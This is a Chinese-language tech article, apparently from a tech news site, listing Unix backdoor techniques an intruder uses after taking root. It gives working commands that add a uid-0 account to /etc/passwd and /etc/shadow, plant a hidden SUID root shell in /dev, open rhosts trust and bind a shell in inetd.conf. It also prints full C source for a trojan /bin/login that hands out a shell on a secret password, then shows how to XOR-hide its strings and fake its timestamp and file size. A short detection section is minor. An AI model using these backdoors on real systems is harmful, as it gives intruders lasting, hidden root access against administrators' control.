扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
入侵者完全控制系统后,为方便下次进入而采用的一种技术。
一般通过修改系统配置文件和安装第三方后门工具来实现。 具有隐蔽性,能绕开系统日志,不易被系统管理员发现等特点。
常用后门技术
增加超级用户账号
破解/嗅探用户密码
放置SUID Shell
rhosts + +
利用系统服务程序
TCP/UDP/ICMP Shell
Crontab定时任务
共享库文件
工具包rootkit
可装载内核模块(LKM)
增加超级用户
# echo "e4gle:x:0:0::/:/bin/sh" >>/etc/passwd
# echo "e4gle::-1:-1:-1:-1:-1:-1:500" >>/etc/shadow
如果系统不允许uid=0的用户远程登录,还需要增加一个普通用户账号。
破解/嗅探用户密码
获得shadow文件后,用John the Ripper 工具破解薄弱的用户密码。安装sniffit等嗅探工具,监听telnet、ftp等端口,收集用户密码。
放置SUID Shell
# cp /bin/bash /dev/.rootshell
# chmod u+s /dev/.rootshell
普通用户在本机运行/dev/.rootshell,即可获得一个root权限的shell。
rhosts + +
# echo "+ +" >/.rhosts
# rsh -l root victim.com csh -i
远程可以得到一个rootshell。
利用系统服务程序
修改/etc/inetd.conf, daytime stream tcp nowait /bin/sh sh -I ;用trojan程序替换in.telnetd、in.rexecd等inted的服务程序
重定向login程序
TCP/UDP/ICMP Shell
BindShell,大部分是基于TCP/UDP协议的网络服务程序,在高端口监听,很容易被发现。Ping Backdoor,通过ICMP包激活后门,形成一个Shell通道。
TCP ACK数据包后门,能够穿越防火墙。
Crontab定时任务
通过Crontab程序调度已安装的后门程序定时运行,一般在深夜时段,是系统管理员不在线的时间。
共享库文件
在共享库中嵌入后门函数使用后门口令激活Shell,获得权限能够躲避系统管理员对二进制文件本身的校验
工具包rootkit
包含一系列系统及后门工具:
◆清除日志中的登录记录
◆伪装校验和
◆替换netstat、ps等网络工具
◆后门登录程序易于安装和使用
可装载内核模块(LKM)
LKM:Loadable Kernel Modules 动态的加载,不需要重新编译内核。
截获系统调用,具有隐藏目录、文件、进程、网络连接等强大功能。
自身隐蔽性好,发现难度较大。
著名的LKM包有adore和knark。
后门的检测
以自己的经验,结合特定的工具,手工作一些检测。
使用Tripwire或md5校验来检查系统。
借助IDS系统,监听到目标机器的可疑网络连接。
实例:login后门
入侵者先把原始的/bin/login备份,再用一段程序替换/bin/login。入侵者telnet登录进来的时候,通过环境变量或者终端类型
传递了正确的后门密码,将直接获得一个Shell;如果是普通用户登录,将会重定向到原始的login文件,来处理正常的登录。
最简单的login后门ulogin.c源代码如下:
实例:login后门
#include
#define PASSWORD "passWORD"
#define _PATH_LOGIN "/sbin/logins"
main (argc, argv, envp)
int argc;
char **argv, **envp;
{
char *display = getenv("DISPLAY");
if ( display == NULL ) {
execve(_PATH_LOGIN, argv, envp);
perror(_PATH_LOGIN);
exit(1);
}
if (!strcmp(display,PASSWORD)) {
system("/bin/csh");
exit(1);
}
execve(_PATH_LOGIN, argv, envp);
exit(1);
}
利用后门登录bash$ export DISPLAY=passWORD bash$ telnet victim.com Trying xxx.xxx.xxx.xxx... Connected to victim.com (xxx.xxx.xxx.xxx). Escape character is '^]'. % _ strings命令 strings命令能够打印出二进制文件中的可显示字符串,用于刚才的ulogin程序: bash$ strings ulogin /lib/ld-linux.so.2 .............. DISPLAY /sbin/logins passWORD /bin/csh |
#include main(int argc, char *argv[]) { if (argc != 3) { printf("usage: %s \n", argv[0]); exit(1); } printf("%s\n", crypt(argv[1], argv[2])); } |
if (!strcmp(PASSWORD, crypt(display,PASSWORD))) { system(SHELL); exit(1); } |
采用异或(XOR)算法
以十六进制方式表示字符串,以达到non- printable的效果
1、编码程序encode.c如下:
char magic[]="\x71\x67\x6d\x7a\x65\x61\x7a"; char *de(char *str,char *key) { int i=0,j=0,len; len=strlen(key); while(str[i] != '\0') { str[i]^=key[j]; j++; if(j==len) j=0; i++; } return str; } void display(char *str) { int i; for(i=0;iprintf("\n"); } main() { char gets[100], *ptr; ptr=gets; scanf ("%s",ptr); de(ptr,magic);display(ptr); } |
\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb |
Char login[]="\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb"; |
# ls -l /sbin/xlogin -r-sr-xr-x root root 19300 Feb 11 1998 /sbin/xlogin # touch -t 199802110000 ulogin # _ |
# ls -l ulogin /sbin/xlogin -r-sr-xr-x root root 7542 Feb 11 1998 ulogin -r-sr-xr-x root root 19300 Feb 11 1998 /sbin/xlogin # bc 19300-7542 11758 # dd if=/sbin/xlogin of=/tmp/t bs=11758 count=1 1+0 records in 1+0 records out 11758 bytes transferred in 0.000379 secs (31016746 bytes/sec) # cat /tmp/t >> ulogin |
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
去集群 更超群——大容量网络演进之路
2019 IBM 中国论坛
H3C 2019 Navigate 领航者峰会
助推数据中心网络现代化转型 打造灵活可靠基础架构平台